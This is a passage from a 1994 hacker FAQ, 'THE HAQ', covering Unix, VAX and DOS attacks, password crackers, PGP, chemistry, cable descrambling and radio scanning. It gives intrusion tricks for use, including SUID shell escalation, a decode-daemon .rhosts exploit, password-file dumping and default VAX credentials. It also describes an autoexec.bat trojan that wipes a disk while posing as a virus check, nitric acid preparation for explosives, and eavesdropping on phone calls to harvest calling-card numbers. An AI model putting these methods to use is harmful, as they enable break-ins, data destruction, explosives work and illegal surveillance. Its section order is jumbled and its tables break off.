number, home phone. Also a good source of info to try and crack a password. home dir -=> is the directory where the user goes into the system at (and usually should be brought to when a cd is done) shell -=> this is the name of the shell which is automatically started for the login Note that all the fields are separated by colons in the passwd file. ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^ WHAT DO THOSE *s, !s, AND OTHER SYMBOLS MEAN IN THE PASSWD FILE? (from Belisarius) Those mean that the password is shadowed in another file. You have to find out what file, where it is and so on. Ask somebody on your system about the specifics of the Yellow Pages system, but discretely! ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^ WHAT IS A UNIX TRIPWIRE? (from Belisarius) Tripwire is a tool for Unix admins to use to detect password cracker activity, by checking for changed files, permissions, etc. Good for looking for trojan horses like password stealing versions of telnet/rlogin/ypcat/uucp/etc, hidden setuid files, and the like. ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^ USING SUID/GUID PROGS TO FULL ADVANTAGE. (from Abort) A SUID program is a program that when executed has the privs of the owner. A GUID has the privs of the group when executed. Now imagine a few things (which happen often in reality): 1. Someone has a SUID program on their account, it happens to allow a shell to, like @ or jump to a shell. If it does that, after you execute said file and then spawn a shell off of it, all you do in that shell has the privs of that owner. 2. If there is no way to get a shell, BUT they leave the file writable, just write over it a script that spawns a shell, and you got their privs again. ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^ HOW CAN I HACK INTO AN AIX MACHINE? (from Prometheus) If you can get access to the 'console' AIX machines have a security hole where you can kill the X server and get a shell with ctrl-alt-bkspce. Also by starting an xterm up from one you are not logged in the utmp for that session because the xterms don't do utmp logging as a default in AIX. Or try the usual UNIX tricks: ftping /etc/passwd, tftping /etc/passwd, doing a finger and then trying each of the usernames with that username as a password. ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^ HOW CAN I INCREASE MY DISK QUOTA ON UNIX? (from Prometheus) A UNIX disk quota may be increased by finding a directory on another partition and using that. Find another user who wants more quota and create a directory for the other to use, one that is world writable. Once they've put their subdirectory in it, change the perms on the directory to only read-execute. The reason this works is that usually accounts are distributed across a couple of filesystems, and admins are usually too lazy to give users the same quotas on each filesystem. If the users are all on one filesystem, you may be able to snag some space from one of the /usr/spool directories by creating a 'hidden' subdirectory like .debug there, and using that. ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^ HOW CAN I FOOL AROUND ON XTERM / XWINDOWS? (from Wildgoose) Most x commands have a -display option which allows you to pick a terminal to send to. So if you use bitmap to create a bitmap, or download one, etc then: xsetroot -bitmap bitmapname [display the bitmap on your screen] xsetroot -bitmap bitmapname -display xt2500:0 [display the bitmap on another xterm] Other uses, try xterm -display xt??:0 will give someone else one of your login windows to play with. They are then logged in as you though, and can erase your filespace, etc. Beware! Slightly irritating: xclock -geom 1200x1200 -display xt??:0 [fills the entire screen with a clock] Slightly more irritating: Use a shell script with xsetroot to flash people's screens different colors. On the nastier side: Use a shell script with xsetroot to kill a person's window manager. Downright nasty: Consult the man pages on xkill. It is possible to kill windows on any display. So to log someone off an xterm you merely have to xkill their login window. Protect yourself: If you use xhost - this will disable other people from being able to log you out or generally access your terminal. ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^ HOW CAN I TAKE ADVANTAGE OF THE DECODE DAEMON? (from Caustic) First, you need to make sure that the decode daemon is active. Check this by telnetting to the smtp port (usually port 25), and expanding user Decode. If it gives you something, you can use it. If it tells you that the user doesn't exist, or whatever, you can't. If the daemon is active, this is how to exploit the decode daemon: 1) uuencode an echo to .rhosts 2) pipe that into mail, to be sent to the decode daemon (What happens: the decode daemon (1st) decodes the process, but leaves the bin priveleges resident. (2nd) the echo command is executed, because now the decoded message assumes the bin priveleges [which are *still* active, even though the daemon didn't issue the command]). 3) If this is done right, you will be able to rlogin to the sysem. ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^ HOW CAN I GET THE PASSWORD FILE IF IT IS SHADOWED? (from Belisarius) If your system has Yellow Pages file managment: ypcat /etc/passwd > whatever.filename ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^ HOW IS A PASSWORD ENCRYPTED IN UNIX? (from UNIX System Security[p.147]) Password encryption on UNIX is based on a modified version of the DES [Data Encryption Standard]. Contrary to popular belief, the typed password is not encrypted. Rather the password is used as the key to encrypt a block of zero-valued bytes. To begin the encryption, the first seven bits of each character in the password are extracted to form the 56-bit key. This implies that no more than eight characters are significant in a password. Next, the E table is modified using the salt, which is the first two characters of the encrypted password (stored in the passwd file). The purpose of the salt is to makae it difficult to use hardware DES chips or a precomputed list of encrypted passwords to attack the algorithm. The DES algorithm (with the modified E table) is then invoked for 25 iterations on the block of zeros. The output of this encryption, which is 64 bits long, is then coerced into a 64-character alphabet (A-Z, a-z, 0-9, "." and "/"). Because this coersion involves translations in which several different values are represented by the same character, password encryption is essentially one-way; the result cannot be decrypted. ===================================================================== VIII. Screwing with the most secure operating system on the net (VAX/VMS Hacking) WHAT IS VAX/VMS? VAX: Virtual Address eXtension. Computer is desisgned to use memory addresses beyond the actual hardware and can therefore run progs larger than physical memory. Developed by Digital Equipment Corporation (DEC). VMS: Virtual Memory System. Also developed by DEC. DCL: Digital Command Language. Similar to DOS batch language or UNIX script language. ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^ WHAT ARE SOME OF THE DEFAULT VAX LOGINS? Username Password -------- -------- DECNET DECNET DEFAULT DEFAULT DEMO DEMO unpassworded FIELD FIELD SERVICE GUEST GUEST unpassworded OPERATOR OPERATOR OPERATIONS OPERATIONS SYSMAINT SYSMAINT SERVICE DIGITAL SYSTEM SYSTEM MANAGER OPERATOR SYSLIB SYSTEST UETP SYSTEST SYSTEST_CLIG CLIG SYSTEST TEST SUPPORT SUPPORT DEC ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^ WHAT ARE SOME OF THE BASIC COMMANDS FROM THE "$" PROMPT? @: executes a DCL program usage- @filename.com ACCOUNTING: program that tracks usage of the system by users CREATE: PASCAL compiler usage- CREATE filename.pas CREATE/DIR: create a subdirectory DEL: delete files usage- DEL filename.ext DIR: list the contents of a directory options- /FULL = full listing with all security info /BRIEF = brief listing * = wildcard for anything % = wildcard for a specific character EDIT: VMS editor, requires VT-220 terminal HELP: brings up help info LOGOUT: obvious MAIL: send E-mail locally and to any connected networks $PASSWORD: change your password usage- $PASSWORD newpassword PHONE: chat program usage- PHONE changes the prompt to a '%', from there type in the username you wish to talk to. If the user is on a different node then enter nodename::username PHOTO: record session RUN: execute an executable file SHOW: lets you look at alot of different stuff usage- SHOW option options- CLUSTER = VAX cluster, if any DEFAULT = directory path and device DEVICES = system devices (drives, modems, etc.) INTRUSION = accounts being hacked, if any MEMORY = obvious NETWORK = network name and VAX's location in it PROCESS = PROCESS processname shows status QUOTA = disk space available for account SYSTEM = system info DAY = obvious TIME = obvious USERS = online users TYPE: display file on terminal (same as DOS 'type' and UNIX 'cat') SET FILE/PROTECTION: sets the Read/Write/Execute/Delete flags usage- SET FILE/PROTECTION=OWNER[RWED] filename.ext options- WORLD, GROUP, or SYSTEM can be used in place of OWNER WORLD = all users in your world GROUP = all users in your group SYSTEM = all users with SYSPRV privileges SET TERMINAL: controls terminal settings usage- SET TERMINAL/option options- WIDTH=80 = set width to 80 columns ADVANCED_VIDEO = selects 124x24 lines NOADVANCED_VIDEO = unselects 124x24 lines ANSI_CRT = selects ANSI escape sequences NOANSI_CRT = unselects ANSI escape sequences AUTOBAUD = allows computer to select highest possible baud rate NOAUTOBAUD = turn off automatic baud selection BROADCAST = allows receipt of SEND, MAIL and PHONE messages NOBROADCAST = prevents receiption of SEND, MAIL and PHONE messages DEVICE_TYPE=VT220 = set terminal type to VT-220 ECHO = enables echoing from DCL command line NOECHO = disable DCL command line echoing FULLDUP = enable full duplex NOFULLDUP = disable full duplex HANGUP = log off if no carrier NOHANGUP = don't log off even if no carrier INQUIRE = show device type of terminal PAGE=43 = set display length to 43 lines TYPE_AHEAD = enable type ahead function NOTYPE_AHEAD = disable type ahead function UNKNOWN = use for ASCII device types WRAP = set wrap around feature NOWRAP = unset wrap around feature ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^ WHAT ARE COMMON VAX FILENAME EXTENSIONS? COMPILER SOURCE CODE FILES ========================== ADA = ADA compiler source code file BAS = BASIC compiler source code file B32 = BLISS-32 compiler source code file C = C compiler source code file COB = COBOL compiler source code file FOR = FORTRAN compiler source code file MAR = MACRO compiler source code file PAS = PASCAL compiler source code file PLI = PL/I compiler source code file OBJ = object code created by compiler before linking DCL LANGUAGE FILES ================== CLD = DCL command description file COM = DCL batch file GENERAL FILES ============= DAT = DATa file DIR = subDIRectory file EXE = EXEcutable program HLP = text for HeLP libraries LIS = system listing files (TYPE, PRINT, PHOTO) LOG = batch job output MEM = DSR output file RNO = DSR source file SIXEL = file for SIXEL graphics SYS = SYStem image file TJL = Trouble JournaL TMP = TeMPorary file TXT = text library input file UAF = User Autorization File MAIL FILES ========== DIS = DIStribution file MAI = MAIl message file TXT = mail output file EDT EDITOR FILES ================ EDT = command file for the EDT editor JOU = EDT journal when problems occur TPU = editor command file ===================================================================== IX. Screwing with the most widespread operating system on PCs (MS-DOS Hacks) HOW TO REALLY **ERASE** A HARDDRIVE (from Amarand) Install a small program (in the Dos directory would be good) called Wipe, by Norton Utilities. I am pretty sure that executing this program, using the proper command line options, you can for one better than formatting the hard drive. Wiping the information changes each bit in the object (file, FAT, disk, hard drive) to a zero...or a random bit, or an alternating bit instead of just deleting the reference to it in the file allocation table. If you just delete a file, or format a hard drive...with the new Dos you would only need to let it run its course and then Unformat the drive. Wipe, I have found, works much more effectively by first erasing the file allocation table AFTER erasing the information the file allocation table is used to find. ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^ WRITING A .bat FILE TO 'WIPE' A DRIVE. Add the following code to the end of autoexec.bat: echo Please wait echo Checking HardDisk for virii, this make take a while ... wipe > nothing.txt This prevents any output from Wipe being output. ===================================================================== X. Finding out what that encrypted info is (Cracking programs) WHAT ARE PASSWORD CRACKING PROGRAMS? (from Belisarius) There are three main cracking programs. They are Crack, Cracker Jack and Cops. The latest versions are 4.1 for Crack and 1.4 for Cracker Jack. Crack and COPS run on UNIX and CJack runs on a PC. CJack1.3 runs on any x86 class and CJack1.4 needs at least a 386. To use any of these requires access to an unshadowed password file. They are not programs that try to login to an account. They take the password file (/etc/passwd in UNIX is usually the name) and guess the passwords. ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^ WHERE CAN I GET THESE PROGRAMS? Crack: ftp.virginia.edu /pub/security CrackerJack: bnlux1.bnl.gov /pub/pezz COPS: ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^ WHAT IS WPCRACK? WPCRAK is a cracker to break the encryption on WordPerfect files. It works, but takes a long time to run. ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^ WHAT IS PKCRACK? PKCRACK is a dictionary cracker for PKZIP. It works. It's dictionary, but it works. Not all that well, as you may have to sift through multiple possible passwords, but its better than nothing. ===================================================================== XI. How do I keep my info secure (PGP / Cryptology) WHAT IS PGP? (from Belisarius) PGP stands for Pretty Good Protection, from a company called Pretty Good Software. It is a public key encryption program for MS-DOS, Unix, and Mac. You create a key pair. One private (secret) key and a public key. The keys are different parts of the whole. I distribute my public key and anyone who wants can grab it ad it to their PGP keyring. Then when they want to send me a message they encrypt it with PGP and my public key and then send it. Only I can decrypt it because you need my secret key to decode it. (Trust me you won't get my secret key) That is PGP. Please use it if you want to communicate anything of a ahhhh....sensitive manner. ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^ WHERE CAN I GET PGP? (from an archie search) FTP sites for PGP=Pretty Good Privacy Public Encryption System ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^ ======== Unix PGP ======== Host 130.149.17.7 Location: /pub/local/ini/security FILE -rw-rw-r-- 651826 Apr 5 1993 pgp22.tar.Z Host arthur.cs.purdue.edu Location: /pub/pcert/tools/unix/pgp FILE -r--r--r-- 651826 Mar 7 1993 pgp22.tar.Z Host coombs.anu.edu.au Location: /pub/security/cypher FILE -r--r--r-- 651826 Nov 4 22:28 pgp22.tar.Z ========== MS-DOS PGP ========== Host zero.cypher.com Location: /pub/pgp FILE pgp23a.zip ================ MS-DOS PGP SHELL ================ Host athene.uni-paderborn.de Location: /pcsoft/msdos/security FILE -rw-r--r-- 65160 Aug 9 20:00 pgpshe22.zip Host nic.switch.ch Location: /mirror/msdos/security FILE -rw-rw-r-- 65160 Aug 9 22:00 pgpshe22.zip Host plains.nodak.edu Location: /pub/aca/msdos/pgp FILE -rw-r--r-- 65430 Nov 26 18:28 pgpshe22.zip ======= Mac PGP ======= Host plaza.aarnet.edu.au Location: /micros/mac/info-mac/util FILE -r--r--r-- 323574 Apr 26 1993 pgp.hqx Host sics.se Location: /pub/info-mac/util FILE -rw-rw-r-- 323574 Nov 5 11:20 pgp.hqx Host sumex-aim.stanford.edu Location: /info-mac/util FILE -rw-r--r-- 323574 Apr 26 1993 pgp.hqx ===================================================================== XII. Chemistry 101 (explosive/pyrotechnic component prep) XIII. Fun things with solder, wires, and parts (Underground electronics) XIV. Watching television (cable, Pay-Per-View(PPV), scrambling) XV. What's on the radio waves? (Radios and Scanning) HOW TO MAKE NITRIC ACID: (from Neurophire) Nitric acid is not TOO expensive, but is hard to find except from chemical supply houses. Purchases can be traced.(From TBBOM13.TXT) There are several ways to make this most essential of all acids for explosives. One method by which it could be made will be presented. again, be reminded that these methods SHOULD NOT BE CARRIED OUT!! Materials: Equipment: ---------- ---------- sodium nitrate or adjustable heat source potassium nitrate retort distilled water ice bath concentrated sulfuric acid stirring rod collecting flask with stopper 1) Pour 32 milliliters of concentrated sulfuric acid into the retort. 2) Carefully weigh out 58 grams of sodium nitrate, or 68 grams of potassium nitrate. and add this to the acid slowly. If it all does not dissolve, carefully stir the solution with a glass rod until it does. 3) Place the open end of the retort into the collecting flask, and place the collecting flask in the ice bath. 4) Begin heating the retort, using low heat. Continue heating until liquid begins to come out of the end of the retort. The liquid that forms is nitric acid. Heat until the precipitate in the bottom of the retort is almost dry, or until no more nitric acid is forming. CAUTION: If the acid is heated too strongly, the nitric acid will decompose as soon as it is formed. This can result in the production of highly flammable and toxic gasses that may explode. It is a good idea to set the above apparatus up, and then get away from it. Potassium nitrate could also be obtained from store-bought black powder, simply by dissolving black powder in boiling water and filtering out the sulfur and charcoal. To obtain 68 g of potassium nitrate, it would be necessary to dissolve about 90 g of black powder in about one liter of boiling water. Filter the dissolved solution through filter paper in a funnel into a jar until the liquid that pours through is clear. The charcoal and sulfur in black powder are insoluble in water, and so when the solution of water is allowed to evaporate, potassium nitrate will be left in the jar. ===================================================================== XIII. Fun things with solder, wires, and parts (Underground electronics) HOW TO MAKE HIGH FREQUENCY TONES TO ANNOY SOMEONE? (from Angel of Death with Belisarius) The idea is to make a simple timing circuit to create a high freq tone. The timing circuit is based upon the 555-chip and uses a simple speaker to convert the pulses from the 555 into sound. Required materials: 555 timer chip, 9 V battery, .01 uF capacitor, 100k potentiometer, tweeter speaker, wire (the capacitor and resistor values can vary although that changes the possible freqs) -9V (GND) [\ | [s\ | ________ ________ [p \ | | \/ | [e +-------+-------------------+--| 1 8 |-- +9V [a | | | | [k | | | /.01uF CAP | 5 | [e +-+ +--|(------+-----------| 2 5 7 | [r / | | \ | | 5 | [ / | | | | [/ +--------------- | ----------| 3 t 6 |----+ | | | i | | | | | m | | | | +9V --| 4 e 5 | | | | | r | | | | |__________________| | | | | | /\ | | +----\ / \-----+-----------------------------------+ \/ 100k POT 555 Timer Pin Connections ------------------------- Pin 1: Ground (-9V side of bat), one lead of tweeter, one lead of capacitor Pin 2: Pin 6 and other lead of capacitor Pin 3: Other lead of the tweeter, one lead of the resistor Pin 4: Pin 8 and the +9V Pin 5: No connections Pin 6: Pin 2 and the other lead of the potentiometer Pin 7: No connections Pin 8: Pin 4 and the +9V ===================================================================== XIV. Watching television (cable, Pay-Per-View(PPV), scrambling) HOW IS CABLE TV SCRAMBLED? (from Aero) There are three main types of scrambling for cable TV: trap filters, gernaral scrambling and addressable scrambling. 1. Trap filters. Located in the distribution box and physically prevent the desired channel from reaching your house. All you see when this techniques is used is theoretically static (i.e. a blank channel). No filter is perfect, so some signal may reach your TV. This is an older system of cable protection, and it is easy to bypass (go out to the box and remove the filter). 2. General scrambling. This system scrambles the pay channels (all the channels before they reach the box), and you need a special decoder to unscramble them. The most common method of scambling is to remove the sync signal. This is also easy to get around as you can buy descramblers. 3. Addressable descramblers. The cable box receives the scrambled channels, but the cable company sends signals to the box telling it which ones should be unscrambled. This is the system used by most pay-per-view systems. This is a little harder to defeat, but not too bad if you have the right equipment/friends. -=-=-=-=-=-=-=-=-=-=-=-=-=- END of THE HAQ2.07/2 -=-=-=-=-=-=-=-=-=-=-=- ** Jun 13, 1994 19:54 from Belisarius _____________ / / / *** *** ****** ****** / *** *** ********* ********* / / *** *** *** *** *** *** / / *********** *********** *** *** / /_____ ______ *********** *********** *** ** *** / / / /_____/ *** *** *** *** *** ***** / / / / *** *** *** *** *********** / / / /______ *** *** *** *** ***** *** +---------------+ | THE HAQ | | Edition 2.07 | | 11 JUN 1994 | +---------------+ File 3 of 3 ===================================================================== XV. Tuning in to what's on the radio waves (Radios and Scanning) WHAT DO I NEED TO START SCANNING? There are to type of main scanner types (determined by the method of radio reception): either crystal or programmable(synthetic) tuning. Crystal tuning requires a specific crystal for each desired freq, at ====== =============== 1 46.610 2 46.630 3 46.670 4 46.710 5 46.730 6 46.770 7 46.830 8 46.870 9 46.930 10 46.970 The range on cordless phones is usually only a block or two. To monitor someones calls use a small portable scanner and cassette recorder and you will have a tape of all their calls. ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^ HOW CAN I SCAN CELLULAR PHONE CONVERSATIONS? Cellular telephones are a great source of info as they are used by doctors, lawyers, and other big business. They are also a great source of calling card numbers. Cellular phones operate on a very simple premise. They receive on one frequency and transmit on another freq in order to allow simultaneous communication. The area is split into two bands (Band A and Band B) which are split into 21 cells (hence the name cellular) and each cell has 16 channels within it. Cellular arrangment: ______ ______ / \ / \ / \ / \ / Cell \______/ Cell \______ \ #1 / \ #5 / \ \ / \ / \ \______/ Cell \______/ Cell \ / \ #3 / \ #7 / / \ / \ / / Cell \______/ Cell \______/ \ #2 / \ #6 / \ \ / \ / \ \______/ Cell \______/ Cell \ / \ #4 / \ #8 / Band A uses channels 1-333 and Band B uses channels 334-666. Usually the first channel in each cell is the Data Channel (333 for Cell 1A, 331 for Cell 2A, etc.). There are simple formulas to calculate the frequency for receive and transmit for each channel. Transmit freq = (channel number * .030 MHz) + 870 MHz Receive freq = (channel number * .030 MHz) + 825 MHz So for Channel 333: T=879.990 MHz and R=834.990 MHz FOR BAND A ========== Cell # Chan 1 2 3 4 5 6 7 1 333 332 331 330 329 328 327 879.990 879.960 879.930 879.900 879.870 879.840 879.810 834.990 834.960 834.930 834.900 834.870 834.840 834.810 2 312 311 310 309 308 307 306 879.360 879.330 879.300 879.270 879.240 879.210 879.180 834.360 834.330 834.300 834.270 834.240 834.210 834.180 3 291 290 289 288 287 286 285 878.730 878.700 878.670 878.640 878.610 878.580 878.550 833.730 833.700 833.670 833.640 833.610 833.580 833.550 4 270 269 268 267 266 265 264 878.100 878.070 878.040 878.010 877.980 877.950 877.920 833.100 833.070 833.040 833.010 832.980 832.950 832.920 5 249 248 247 246 245 244 243 877.470 877.440 877.410 877.380 877.350 877.320 877.290 832.470 832.440 832.410 832.380 832.350 832.320 832.290 6 228 227 226 225 224 223 222 876.840 876.810 876.780 876.750 876.720 876.690 876.660 831.840 831.810 831.780 831.750 831.720 831.690 831.660 7 207 206 205 204 203 202 201 876.210 876.180 876.150 876.120 876.090 876.060 876.030 831.210 831.180 831.150 831.120 831.090 831.060 831.030 8 186 185 184 183 182 181 180 875.580 875.550 875.520 875.490 875.460 875.430 875.400 830.580 830.550 830.520 830.490 830.460 830.430 830.400 9 165 164 163 162 161 160 159 874.950 874.920 874.890 874.860 874.830 874.800 874.770 829.950 829.920 829.890 829.860 829.830 829.800 829.770 10 144 143 142 141 140 139 138 874.320 874.290 874.260 874.230 874.200 874.170 874.140 829.320 829.290 829.260 829.230 829.200 829.170 829.140 11 123 122 121 120 119 118 117 873.690 873.660 873.630 873.600 873.570 873.540 873.510 828.690 828.660 828.630 828.600 828.570 828.540 828.510 12 102 101 100 99 98 97 96 873.060 873.030 873.000 872.970 872.940 872.910 872.880 828.060 828.030 828.000 827.970 827.940 827.910 827.880 13 81 80 79 78 77 76 75 872.430 872.400 872.370 872.340 872.310 872.280 872.250 827.430 827.400 827.370 827.340 827.310 827.280 827.250 14 60 59 58 57 56 55 54 871.800 871.770 871.740 871.710 871.680 871.650 871.620 826.800 826.770 826.740 826.710 826.680 826.650 826.620 15 39 38 37 36 35 34 33 871.170 871.140 871.110 871.080 871.050 871.020 870.990 826.170 826.140 826.110 826.080 826.050 826.020 825.990 16 18 17 16 15 14 13 12 870.540 870.510 870.480 870.450 870.420 870.390 870.360 825.540 825.510 825.480 825.450 825.420 825.390 825.360 Cell # Chan 8 9 10 11 12 13 14 1 326 325 324 323 322 321 320 879.780 879.750 879.720 879.690 879.660 879.630 879.600 834.780 834.750 834.720 834.690 834.660 834.630 834.600 2 305 304 303 302 301 300 299 879.150 879.120 879.090 879.060 879.030 879.000 878.970 834.150 834.120 834.090 834.060 834.030 834.000 833.970 3 284 283 282 281 280 279 278 878.520 878.490 878.460 878.430 878.400 878.370 878.340 833.520 833.490 833.460 833.430 833.400 833.370 833.340 4 263 262 261 260 259 258 257 877.890 877.860 877.830 877.800 877.770 877.740 877.710 832.890 832.860 832.830 832.800 832.770 832.740 832.710 5 242 241 240 239 238 237 236 877.260 877.230 877.200 877.170 877.140 877.110 877.080 832.260 832.230 832.200 832.170 832.140 832.110 832.080 6 221 220 219 218 217 216 215 876.630 876.600 876.570 876.540 876.510 876.480 876.450 831.630 831.600 831.570 831.540 831.510 831.480 831.450 7 200 199 198 197 196 195 194 876.000 875.970 875.940 875.910 875.880 875.850 875.820 831.000 830.970 830.940 830.910 830.880 830.850 830.820 8 179 178 177 176 175 174 173 875.370 875.340 875.310 875.280 875.250 875.220 875.190 830.370 830.340 830.310 830.280 830.250 830.220 830.190 9 158 157 156 155 154 153 152 874.740 874.710 874.680 874.650 874.620 874.590 874.560 829.740 829.710 829.680 829.650 829.620 829.590 829.560 10 137 136 135 134 133 132 131 874.110 874.080 874.050 874.020 873.990 873.960 873.930 829.110 829.080 829.050 829.020 828.990 828.960 828.930 11 116 115 114 113 112 111 110 873.480 873.450 873.420 873.390 873.360 873.330 873.300 828.480 828.450 828.420 828.390 828.360 828.330 828.300 12 95 94 93 92 91 90 89 872.850 872.820 872.790 872.760 872.730 872.700 872.670 827.850 827.820 827.790 827.760 827.730 827.700 827.670 13 74 73 72 71 70 69 68 872.220 872.190 872.160 872.130 872.100 872.070 872.040 827.220 827.190 827.160 827.130 827.100 827.070 827.040 14 53 52 51 50 49 48 47 871.590 871.560 871.530 871.500 871.470 871.440 871.410 826.590 826.560 826.530 826.500 826.470 826.440 826.410 15 32 31 30 29 28 27 26 870.960 870.930 870.900 870.870 870.840 870.810 870.780 825.960 825.930 825.900 825.870 825.840 825.810 825.780 16 11 10 9 8 7 6 5 870.330 870.300 870.270 870.240 870.210 870.180 870.150 825.330 825.300 825.270 825.240 825.210 825.180 825.150 Cell # Chan 15 16 17 18 19 20 21 1 319 318 317 316 315 314 313 879.570 879.540 879.510 879.480 879.450 879.420 879.390 834.570 834.540 834.510 834.480 834.450 834.420 834.390 2 298 297 296 295 294 293 292 878.940 878.910 878.880 878.850 878.820 878.790 878.760 833.940 833.910 833.880 833.850 833.820 833.790 833.760 3 277 276 275 274 273 272 271 878.310 878.280 878.250 878.220 878.190 878.160 878.130 833.310 833.280 833.250 833.220 833.190 833.160 833.130 4 256 255 254 253 252 251 250 877.680 877.650 877.620 877.590 877.560 877.530 877.500 832.680 832.650 832.620 832.590 832.560 832.530 832.500 5 235 234 233 232 231 230 229 877.050 877.020 876.990 876.960 876.930 876.900 876.870 832.050 832.020 831.990 831.960 831.930 831.900 831.870 6 214 213 212 211 210 209 208 876.420 876.390 876.360 876.330 876.300 876.270 876.240 831.420 831.390 831.360 831.330 831.300 831.270 831.240 7 193 192 191 190 189 188 187 875.790 875.760 875.730 875.700 875.670 875.640 875.610 830.790 830.760 830.730 830.700 830.670 830.640 830.610 8 172 171 170 169 168 167 166 875.160 875.130 875.100 875.070 875.040 875.010 874.980 830.160 830.130 830.100 830.070 830.040 830.010 829.980 9 151 150 149 148 147 146 145 874.530 874.500 874.470 874.440 874.410 874.380 874.350 829.530 829.500 829.470 829.440 829.410 829.380 829.350 10 130 129 128 127 126 125 124 873.900 873.870 873.840 873.810 873.780 873.750 873.720 828.900 828.870 828.840 828.810 828.780 828.750 828.720 11 109 108 107 106 105 104 103 873.270 873.240 873.210 873.180 873.150 873.120 873.090 828.270 828.240 828.210 828.180 828.150 828.120 828.090 12 88 87 86 85 84 83 82 872.640 872.610 872.580 872.550 872.520 872.490 872.460 827.640 827.610 827.580 827.550 827.520 827.490 827.460 13 67 66 65 64 63 62 61 872.010 871.980 871.950 871.920 871.890 871.860 871.830 827.010 826.980 826.950 826.920 826.890 826.860 826.830 14 46 45 44 43 42 41 40 871.380 871.350 871.320 871.290 871.260 871.230 871.200 826.380 826.350 826.320 826.290 826.260 826.230 826.200 15 25 24 23 22 21 20 19 870.750 870.720 870.690 870.660 870.630 870.600 870.570 825.750 825.720 825.690 825.660 825.630 825.600 825.570 16 4 3 2 1 870.120 870.090 870.060 870.030 825.120 825.090 825.060 825.030 FOR BAND B ========== Cell # Chan 1 2 3 4 5 6 7 1 334 335 336 337 338 339 340 880.020 880.050 880.080 880.110 880.140 880.170 880.200 835.020 835.050 835.080 835.110 835.140 835.170 835.200 2 355 356 357 358 359 360 361 880.650 880.680 880.710 880.740 880.770 880.800 880.830 835.650 835.680 835.710 835.740 835.770 835.800 835.830 3 376 377 378 379 380 381 382 881.280 881.310 881.340 881.370 881.400 881.430 881.460 836.280 836.310 836.340 836.370 836.400 836.430 836.460 4 397 398 399 400 401 402 403 881.910 881.940 881.970 882.000 882.030 882.060 882.090 836.910 836.940 836.970 837.000 837.030 837.060 837.090 5 418 419 420 421 422 423 424 882.540 882.570 882.600 882.630 882.660 882.690 882.720 837.540 837.570 837.600 837.630 837.660 837.690 837.720 6 439 440 441 442 443 444 445 883.170 883.200 883.230 883.260 883.290 883.320 883.350 838.170 838.200 838.230 838.260 838.290 838.320 838.350 7 460 461 462 463 464 465 466 883.800 883.830 883.860 883.890 883.920 883.950 883.980 838.800 838.830 838.860 838.890 838.920 838.950 838.980 8 481 482 483 484 485 486 487 884.430 884.460 884.490 884.520 884.550 884.580 884.610 839.430 839.460 839.490 839.520 839.550 839.580 839.610 9 502 503 504 505 506 507 508 885.060 885.090 885.120 885.150 885.180 885.210 885.240 840.060 840.090 840.120 840.150 840.180 840.210 840.240 10 523 524 525 526 527 528 529 885.690 885.720 885.750 885.780 885.810 885.840 885.870 840.690 840.720 840.750 840.780 840.810 840.840 840.870 11 544 545 546 547 548 549 550 886.320 886.350 886.380 886.410 886.440 886.470 886.500 841.320 841.350 841.380 841.410 841.440 841.470 841.500 12 565 566 567 568 569 570 571 886.950 886.980 887.010 887.040 887.070 887.100 887.130 841.950 841.980 842.010 842.040 842.070 842.100 842.130 13 586 587 588 589 590 591 592 887.580 887.610 887.640 887.670 887.700 887.730 887.760 842.580 842.610 842.640 842.670 842.700 842.730 842.760 14 607 608 609 610 611 612 613 888.210 888.240 888.270 888.300 888.330 888.360 888.390 843.210 843.240 843.270 843.300 843.330 843.360 843.390 15 628 629 630 631 632 633 634 888.840 888.870 888.900 888.930 888.960 888.990 889.020 843.840 843.870 843.900 843.930 843.960 843.990 844.020 16 649 650 651 652 653 654 655 889.470 889.500 889.530 889.560 889.590 889.620 889.650 844.470 844.500 844.530 844.560 844.590 844.620 844.650 Cell # Chan 8 9 10 11 12 13 14 1 341 342 343 344 345 346 347 880.230 880.260 880.290 880.320 880.350 880.380 880.410 835.230 835.260 835.290 835.320 835.350 835.380 835.410 2 362 363 364 365 366 367 368 880.860 880.890 880.920 880.950 880.980 881.010 881.040 835.860 835.890 835.920 835.950 